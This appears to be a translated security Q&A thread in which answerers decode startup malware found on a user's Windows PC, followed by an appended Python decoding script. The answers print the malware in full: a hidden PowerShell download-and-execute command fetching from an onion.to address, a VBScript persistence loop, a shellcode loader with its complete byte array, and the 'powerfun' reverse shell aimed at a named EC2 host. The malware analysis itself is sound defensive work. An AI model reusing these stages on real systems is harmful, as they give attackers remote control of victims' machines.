web-dev-qa-db-fra.com

Strange code running at startup

A piece of code was running on my Windows machine at startup. I would like to know exactly what this code does; it seems to refer to something like crackbook?

@echo off  
if %PROCESSOR_ARCHITECTURE%==x86 ( START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== ) 
if %PROCESSOR_ARCHITECTURE%==AMD64( START /B %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )

EDIT: I tried formatting my PC. It seems that spyware from prpops.com (NSFW) was installed on my system without notice.

The configuration file that started on my PC is still there even after I formatted my PC. Here is a small piece of code through which it runs.

Dim WinScriptHost 
WScript.Sleep(30000) 
Set WinScriptHost = CreateObject("WScript.Shell") 
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0 
While True 
set service = GetObject ("winmgmts:") 
running = 0 
for each Process in Service.InstancesOf ("Win32_Process") 
    If Process.Name = "powershell.exe" then 
        running = running + 1 
        End If 
next 
If running < 1 then 
    WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0 
    End If 
WScript.Sleep(120000) 
Wend 
Set WinScriptHost = Nothing 

Please tell me whether this downloads the script automatically or stores it in memory in any way?

72
Aditya Giri

Short version

The attacker can run any PowerShell command on your machine and can be found by looking up the owner of "ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com".

Long version

I dumped the byte array to a file and uploaded it to VirusTotal.

The newly launched file looks to me like an additional stage, as it is really small (1.7 KB) and will only run for 10 seconds, since it is bound to PowerShell (the attacker creates a thread instead of launching it as a separate process) and termination is delayed by 10 seconds in the last command.

Update: unfortunately I am not able to reverse-engineer the assembly, but a quick look at the file with a text editor revealed the following string:

powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(
'A really long base64 full code can be found below'));
IEX (New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();)

However, this stage also uses GZIP as an additional obfuscation layer on top of Base64, but it can still be turned into:

# Powerfun - Written by Ben Turner & Dave Hardy

function Get-Webclient 
{
    $wc = New-Object -TypeName Net.WebClient
    $wc.UseDefaultCredentials = $true
    $wc.Proxy.Credentials = $wc.Credentials
    $wc
}
function powerfun 
{ 
    Param( 
    [String]$Command,
    [String]$Sslcon,
    [String]$Download
    ) 
    Process {
    $modules = @()  
    if ($Command -eq "bind")
    {
        $listener = [System.Net.Sockets.TcpListener]9999
        $listener.start()    
        $client = $listener.AcceptTcpClient()
    } 
    if ($Command -eq "reverse")
    {
    $client = New-Object  System.Net.Sockets.TCPClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com",9999)
    }

    $stream = $client.GetStream()

    if ($Sslcon -eq "true") 
    {
        $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
        $sslStream.AuthenticateAsClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com") 
        $stream = $sslStream 
    }

    [byte[]]$bytes = 0..20000|%{0}
    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
    $stream.Write($sendbytes,0,$sendbytes.Length)

    if ($Download -eq "true")
    {
        $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)
        ForEach ($module in $modules)
        {
            (Get-Webclient).DownloadString($module)|Invoke-Expression
        }
    }

    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
    $stream.Write($sendbytes,0,$sendbytes.Length)

    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
    {
        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
        $data = $EncodedText.GetString($bytes,0, $i)
        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

        $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
        $x = ($error[0] | Out-String)
        $error.clear()
        $sendback2 = $sendback2 + $x

        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()  
    }
    $client.Close()
    $listener.Stop()
    }
}

powerfun -Command reverse -Sslcon true

This is a fairly simple PowerShell backdoor that connects to a server and then lets the attacker remotely run PowerShell commands on your machine. This "powerfun" script can be found on GitHub with two seconds of googling, so I won't link it here so as not to stretch the anti-spam limits. However, comparing it to the original script, you will quickly notice that the attacker changed the remote server address to "ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com" and the port to 9999, so it should be easy to track down the attacker if necessary.

Finally: the server is still listening on this port, so the attacker can control your computer!

107
VincBreaker

Short version

Your machine is compromised and the attacker still controls your computer.

Long version

Decoding the base64-encoded expression (the string passed in the -Enc argument) gives you the code executed by PowerShell:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

This code essentially downloads some more PowerShell code from a Tor hidden service (via the onion.to gateway, which allows access to Tor hidden services from a machine not connected to Tor) and executes it.

Here is the code that is downloaded and executed (again, inline execution of a base64-encoded PowerShell script):

powershell -Enc [long base64 encoded string]

Which corresponds to the following code once decoded:

$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x = $o::VirtualAlloc(0, 0x1000, 0x3000, 0x40)
[Byte[]]$sc = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x70,0x6f,0x77,0x65,0x72,0x73,0x68,0x65,0x6c,0x6c,0x2e,0x65,0x78,0x65,0x20,0x2d,0x65,0x78,0x65,0x63,0x20,0x62,0x79,0x70,0x61,0x73,0x73,0x20,0x2d,0x6e,0x6f,0x70,0x20,0x2d,0x57,0x20,0x68,0x69,0x64,0x64,0x65,0x6e,0x20,0x2d,0x6e,0x6f,0x6e,0x69,0x6e,0x74,0x65,0x72,0x61,0x63,0x74,0x69,0x76,0x65,0x20,0x49,0x45,0x58,0x20,0x24,0x28,0x24,0x73,0x3d,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x53,0x74,0x72,0x65,0x61,0x6d,0x28,0x2c,0x5b,0x43,0x6f,0x6e,0x76,0x65,0x72,0x74,0x5d,0x3a,0x3a,0x46,0x72,0x6f,0x6d,0x42,0x61,0x73,0x65,0x36,0x34,0x53,0x74,0x72,0x69,0x6e,0x67,0x28,0x27,0x48,0x34,0x73,0x49,0x41,0x49,0x76,0x6d,0x79,0x56,0x67,0x43,0x41,0x36,0x56,0x57,0x62,0x57,0x2f,0x62,0x4e,0x68,0x44,0x2b,0x37,0x6c,0x39,0x78,0x63,0x4c,0x56,0x61,0x51,0x69,0x7a,0x43,0x4e,0x70,0x70,0x68,0x44,0x5a,0x42,0x69,0x72,0x70,0x4a,0x75,0x41,0x62,0x4c,0x57,0x71,0x4c,0x33,0x6c,0x67,0x32,0x45,0x67,0x74,0x48,0x53,0x4f,0x74,0x55,0x69,0x6b,0x53,0x31,0x4a,0x2b,0x57,0x65,0x4c,0x2f,0x58,0x6c,0x4b,0x69,0x58,0x68,0x77,0x6e,0x36,0x4c,0x4c,0x70,0
x69,0x36,0x33,0x6a,0x33,0x63,0x50,0x6e,0x6e,0x6a,0x73,0x65,0x39,0x51,0x5a,0x47,0x66,0x49,0x4e,0x69,0x6b,0x54,0x48,0x77,0x34,0x55,0x62,0x45,0x53,0x69,0x47,0x44,0x2b,0x51,0x34,0x2b,0x36,0x70,0x39,0x4a,0x4a,0x68,0x67,0x4b,0x65,0x41,0x73,0x58,0x64,0x49,0x33,0x77,0x4f,0x78,0x58,0x52,0x72,0x74,0x58,0x53,0x6e,0x71,0x47,0x4b,0x4f,0x59,0x50,0x66,0x55,0x50,0x6b,0x33,0x4f,0x41,0x2b,0x54,0x47,0x4a,0x6d,0x43,0x31,0x6b,0x4d,0x4c,0x39,0x4f,0x4e,0x73,0x51,0x6a,0x69,0x48,0x7a,0x37,0x6a,0x78,0x76,0x38,0x7a,0x2f,0x78,0x6c,0x43,0x42,0x50,0x39,0x6d,0x74,0x38,0x44,0x4e,0x4e,0x55,0x52,0x73,0x56,0x30,0x66,0x35,0x42,0x37,0x6c,0x38,0x36,0x6b,0x7a,0x38,0x6c,0x58,0x75,0x43,0x43,0x5a,0x6f,0x6b,0x4b,0x42,0x45,0x5a,0x36,0x4a,0x61,0x61,0x4a,0x31,0x42,0x43,0x4f,0x45,0x68,0x6c,0x57,0x58,0x69,0x50,0x42,0x74,0x7a,0x76,0x79,0x78,0x45,0x50,0x62,0x47,0x35,0x62,0x53,0x74,0x37,0x57,0x76,0x4b,0x61,0x37,0x4b,0x31,0x46,0x6f,0x50,0x6b,0x4b,0x2b,0x50,0x71,0x4b,0x43,0x70,0x57,0x2f,0x79,0x66,0x6a,0x70,0x57,0x49,0x32,0x64,0x33,0x4d,0x43,0x58,0x69,0x61,0x55,0x68,0x5a,0x31,0x44,0x36,0x31,0x6a,0x6d,0x59,0x53,0x63,0x50,0x54,0x46,0x65,0x38,0x41,0x31,0x4c,0x4f,0x49,0x31,0x79,0x71,0x32,0x63,0x78,0x42,0x51,0x39,0x52,0x53,0x72,0x41,0x43,0x70,0x44,0x7a,0x4b,0x45,0x6a,0x51,0x45,0x66,0x33,0x55,0x39,0x4b,0x46,0x7a,0x69,0x42,0x62,0x6a,0x6c,0x4e,0x75,0x44,0x6a,0x4e,0x32,0x6a,0x50,0x59,0x78,0x61,0x31,0x76,0x58,0x79,0x78,0x69,0x4d,0x74,0x6a,0x6b,0x31,0x68,0x71,0x2b,0x62,0x58,0x6b,0x35,0x33,0x72,0x4c,0x6e,0x66,0x36,0x66,0x45,0x71,0x50,0x61,0x6d,0x49,0x66,0x33,0x71,0x43,0x53,0x5a,0x68,0x4b,0x74,0x72,0x36,0x7a,0x46,0x37,0x72,0x35,0x2f,0x6a,0x51,0x43,0x49,0x56,0x46,0x63,0x72,0x73,0x61,0x33,0x66,0x4f,0x56,0x32,0x32,0x4a,0x7a,0x68,0x74,0x2b,0x77,0x7a,0x44,0x45,0x6c,0x64,0x4b,0x41,0x52,0x54,0x6e,0x63,0x67,0x73,0x72,0x2b,0x4a,0x62,0x6f,0x43,0x31,0x79,0x67,0x6b,0x48,0x6a,0x4f,0x75,0x6f,0x42,0x73,0x6c,0x66,0x34,0x35,0x35,0x4d,0x4c,0x49,0x62,0x74,0x54,0x45,0x63,0x2b,0x4b,0x66,0x76,0x2f,0x50,0x37,0x50,0x37,0x2f,0x33,0x42,0x75,0x31,0x2f,0x38,0
x66,0x75,0x2b,0x55,0x30,0x4a,0x55,0x76,0x65,0x61,0x61,0x57,0x53,0x4b,0x58,0x79,0x2b,0x79,0x54,0x6b,0x36,0x53,0x70,0x54,0x53,0x47,0x68,0x4b,0x2f,0x2b,0x47,0x4d,0x62,0x71,0x53,0x78,0x74,0x4c,0x73,0x6d,0x59,0x30,0x75,0x7a,0x56,0x55,0x67,0x74,0x6c,0x55,0x43,0x61,0x6d,0x72,0x77,0x4b,0x47,0x6b,0x53,0x33,0x35,0x44,0x69,0x33,0x36,0x58,0x7a,0x71,0x54,0x49,0x70,0x4b,0x46,0x6f,0x6d,0x59,0x72,0x6d,0x72,0x62,0x77,0x6a,0x58,0x53,0x6b,0x44,0x49,0x5a,0x6c,0x32,0x41,0x76,0x5a,0x49,0x4a,0x68,0x70,0x6b,0x2f,0x48,0x6a,0x6f,0x78,0x4c,0x56,0x39,0x66,0x75,0x33,0x33,0x55,0x57,0x75,0x76,0x32,0x77,0x36,0x7a,0x34,0x34,0x45,0x34,0x32,0x2b,0x42,0x35,0x39,0x4b,0x6d,0x42,0x37,0x45,0x66,0x4d,0x57,0x55,0x4b,0x77,0x78,0x51,0x71,0x48,0x67,0x52,0x68,0x31,0x54,0x68,0x58,0x7a,0x53,0x4a,0x49,0x32,0x70,0x36,0x4e,0x4b,0x42,0x4a,0x4d,0x71,0x66,0x68,0x2f,0x63,0x7a,0x7a,0x6e,0x71,0x46,0x44,0x68,0x6b,0x59,0x57,0x33,0x65,0x41,0x6d,0x61,0x43,0x6a,0x2f,0x72,0x34,0x5a,0x65,0x6f,0x79,0x6c,0x71,0x38,0x65,0x72,0x6b,0x6d,0x2b,0x70,0x4f,0x35,0x7a,0x75,0x46,0x30,0x39,0x6e,0x4d,0x4d,0x62,0x2b,0x6d,0x6e,0x58,0x75,0x45,0x44,0x48,0x72,0x36,0x65,0x66,0x7a,0x70,0x6f,0x62,0x65,0x33,0x42,0x55,0x41,0x57,0x6c,0x63,0x76,0x75,0x56,0x4f,0x46,0x57,0x45,0x57,0x51,0x68,0x6a,0x38,0x78,0x5a,0x4f,0x54,0x73,0x62,0x6a,0x6f,0x4f,0x72,0x4b,0x38,0x38,0x55,0x35,0x61,0x50,0x78,0x63,0x64,0x73,0x33,0x75,0x75,0x6e,0x35,0x52,0x68,0x59,0x54,0x5a,0x37,0x7a,0x45,0x4a,0x41,0x47,0x52,0x4d,0x61,0x61,0x39,0x51,0x55,0x75,0x57,0x53,0x64,0x33,0x34,0x62,0x54,0x67,0x42,0x42,0x39,0x6e,0x36,0x7a,0x4c,0x77,0x78,0x4d,0x7a,0x5a,0x4f,0x74,0x45,0x31,0x58,0x72,0x31,0x71,0x77,0x6d,0x56,0x57,0x4c,0x74,0x79,0x7a,0x67,0x71,0x35,0x32,0x49,0x37,0x35,0x59,0x4b,0x33,0x4d,0x43,0x44,0x51,0x61,0x39,0x2f,0x43,0x6e,0x2f,0x45,0x6f,0x65,0x43,0x53,0x4c,0x78,0x51,0x45,0x58,0x4b,0x79,0x34,0x79,0x4b,0x55,0x6d,0x4d,0x44,0x51,0x37,0x47,0x6b,0x38,0x4a,0x41,0x76,0x55,0x47,0x61,0x34,0x7a,0x49,0x4c,0x62,0x74,0x6c,0x74,0x71,0x2b,0x74,0x4a,0x73,0x53,0x4d,0x51,0x58,0x54,0x72,0x37,0x4c,0x71,0x39,0
x62,0x76,0x31,0x43,0x72,0x70,0x48,0x64,0x71,0x57,0x57,0x7a,0x77,0x63,0x71,0x70,0x30,0x47,0x79,0x78,0x6f,0x77,0x35,0x37,0x6e,0x56,0x54,0x54,0x6b,0x78,0x6c,0x63,0x61,0x30,0x69,0x6a,0x6a,0x5a,0x30,0x6f,0x70,0x4f,0x4c,0x35,0x65,0x71,0x35,0x6c,0x31,0x43,0x63,0x75,0x4c,0x6d,0x6d,0x34,0x31,0x4a,0x77,0x4c,0x55,0x49,0x68,0x5a,0x4e,0x62,0x46,0x71,0x72,0x35,0x71,0x32,0x65,0x64,0x79,0x44,0x51,0x65,0x2b,0x52,0x4d,0x74,0x74,0x69,0x4a,0x70,0x5a,0x49,0x33,0x75,0x4d,0x56,0x57,0x2f,0x4e,0x37,0x39,0x43,0x2b,0x33,0x4b,0x36,0x32,0x74,0x31,0x48,0x70,0x58,0x4b,0x50,0x76,0x44,0x55,0x2f,0x73,0x71,0x4a,0x54,0x71,0x6a,0x4d,0x58,0x52,0x30,0x6e,0x58,0x4d,0x57,0x31,0x7a,0x7a,0x4d,0x4b,0x2b,0x6d,0x52,0x45,0x56,0x56,0x4c,0x62,0x65,0x31,0x38,0x36,0x50,0x7a,0x6e,0x30,0x6d,0x32,0x57,0x63,0x59,0x4b,0x75,0x36,0x38,0x54,0x35,0x47,0x53,0x6a,0x43,0x76,0x79,0x4b,0x4e,0x33,0x4b,0x4c,0x6a,0x75,0x39,0x44,0x72,0x67,0x6e,0x4d,0x51,0x35,0x34,0x48,0x50,0x45,0x48,0x70,0x48,0x74,0x62,0x30,0x30,0x39,0x44,0x47,0x61,0x36,0x46,0x52,0x65,0x75,0x76,0x7a,0x73,0x4a,0x44,0x45,0x75,0x4a,0x45,0x2f,0x78,0x30,0x71,0x5a,0x63,0x6f,0x2b,0x68,0x35,0x51,0x41,0x32,0x56,0x42,0x70,0x6f,0x64,0x61,0x4c,0x6e,0x4d,0x5a,0x54,0x72,0x67,0x78,0x4e,0x36,0x54,0x74,0x74,0x4c,0x6a,0x77,0x32,0x68,0x35,0x56,0x41,0x44,0x77,0x79,0x79,0x46,0x65,0x67,0x41,0x38,0x2b,0x76,0x4f,0x33,0x44,0x49,0x33,0x7a,0x4a,0x6c,0x46,0x2b,0x67,0x67,0x70,0x58,0x69,0x41,0x47,0x6f,0x41,0x75,0x53,0x41,0x6c,0x73,0x42,0x62,0x35,0x42,0x79,0x57,0x41,0x54,0x67,0x32,0x79,0x4e,0x55,0x51,0x63,0x46,0x49,0x4b,0x4c,0x61,0x57,0x39,0x32,0x73,0x46,0x6d,0x44,0x64,0x62,0x35,0x4f,0x77,0x67,0x53,0x70,0x63,0x4c,0x33,0x6e,0x47,0x4a,0x77,0x33,0x58,0x2f,0x54,0x42,0x33,0x37,0x61,0x4f,0x54,0x39,0x4b,0x2f,0x61,0x70,0x38,0x61,0x35,0x6f,0x64,0x48,0x70,0x39,0x6b,0x71,0x52,0x77,0x65,0x6e,0x6a,0x50,0x6d,0x55,0x5a,0x48,0x4a,0x5a,0x33,0x65,0x74,0x32,0x44,0x4e,0x72,0x62,0x4a,0x30,0x69,0x34,0x52,0x4a,0x74,0x50,0x66,0x64,0x4f,0x4f,0x46,0x56,0x2b,0x56,0x31,0x36,0x76,0x2b,0x4e,0x6d,0x6c,0x56,0x33,0x79,0x52,0x56,0
x63,0x65,0x7a,0x6c,0x43,0x72,0x36,0x39,0x71,0x4d,0x77,0x41,0x2b,0x51,0x36,0x63,0x4f,0x36,0x39,0x6e,0x6c,0x77,0x6b,0x41,0x41,0x41,0x3d,0x3d,0x27,0x29,0x29,0x3b,0x49,0x45,0x58,0x20,0x28,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x53,0x74,0x72,0x65,0x61,0x6d,0x52,0x65,0x61,0x64,0x65,0x72,0x28,0x4e,0x65,0x77,0x2d,0x4f,0x62,0x6a,0x65,0x63,0x74,0x20,0x49,0x4f,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x2e,0x47,0x7a,0x69,0x70,0x53,0x74,0x72,0x65,0x61,0x6d,0x28,0x24,0x73,0x2c,0x5b,0x49,0x4f,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x2e,0x43,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x69,0x6f,0x6e,0x4d,0x6f,0x64,0x65,0x5d,0x3a,0x3a,0x44,0x65,0x63,0x6f,0x6d,0x70,0x72,0x65,0x73,0x73,0x29,0x29,0x29,0x2e,0x52,0x65,0x61,0x64,0x54,0x6f,0x45,0x6e,0x64,0x28,0x29,0x3b,0x29,0x00
for ($i=0; $i -le ($sc.Length-1); $i++) {
    $o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null
}
$z = $o::CreateThread(0, 0, $x, 0, 0, 0)
Start-Sleep -Second 100000

From my understanding, this code imports system DLLs and then executes native code (the long byte array on line 8).

To dig further, one could rebuild the native code from the byte array and submit it to VirusTotal to try to identify which malware it is, or run the PowerShell script directly in a sandbox to analyse its behaviour dynamically.

EDIT: An analysis of this last part is available in VincBreaker's answer.

43
mdeous

It runs a PowerShell script with Base64-encoded PowerShell code.

Here is the decoded PowerShell code being run:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

So this script downloads and invokes the content of https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq

I'll let you dig further, as I don't want to browse to a potentially malicious link. Especially since it comes from *.onion.to, a TOR address.

10
SecretSasquatch
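The manual decoding steps the answers describe (the UTF-16LE base64 behind -Enc, then the FromBase64String + GzipStream wrapper of the later stage) as a small offline triage script. This is an added example, not code from the question or any answer: it reuses the -Enc string from the question's file.bat, but the gzip stage is a constructed stand-in around a harmless command, since the real second stage is not reproduced here.

```python
import base64
import gzip
import re
# Stage 1: the -Enc argument from the question's file.bat (copied from the page).
PAGE_ENC = (
    "WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIA"
    "dgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEA"
    "YwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4A"
    "ZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIA"
    "aAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4A"
    "LgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA=="
)
PAGE_CMDLINE = "powershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + PAGE_ENC

# Constructed stand-in for the "gzip inside base64" wrapper: same wrapper text as the page, harmless inner command.
INNER = "Write-Host 'constructed inner stage'"
SAMPLE_GZIP_STAGE = (
    "IEX $($s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('"
    + base64.b64encode(gzip.compress(INNER.encode())).decode()
    + "'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
    "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();)"
)

ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
GZ_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

def decode_encoded_command(arg):
    """-Enc/-EncodedCommand carries the script as base64 of UTF-16LE, not UTF-8."""
    return base64.b64decode(arg).decode("utf-16-le")

def decode_gzip_stage(script):
    """Unwrap FromBase64String(...) fed through GzipStream/Decompress, if present."""
    m = GZ_B64.search(script)
    if not m or "GzipStream" not in script:
        return None
    return gzip.decompress(base64.b64decode(m.group(1))).decode("utf-8", "replace")

def unwrap(text):
    """Peel layers until nothing decodes further; returns every stage, outermost first."""
    stages = [text]
    while True:
        m = ENC_ARG.search(stages[-1])
        nxt = decode_encoded_command(m.group(1)) if m else decode_gzip_stage(stages[-1])
        if nxt is None:
            return stages
        stages.append(nxt)

def indicators(stage):
    """Triage facts an analyst wants from a decoded stage."""
    return {
        "urls": re.findall(r"https?://[^\s\"')]+", stage),
        "disables_tls_validation": "ServerCertificateValidationCallback" in stage,
        "download_and_execute": "DownloadString" in stage
        and re.search(r"\biex\b|Invoke-Expression", stage, re.I) is not None,
    }
```

Running unwrap(PAGE_CMDLINE) reproduces the two-line script shown in the answers, and indicators() flags the disabled certificate check and the onion.to download-and-execute in it.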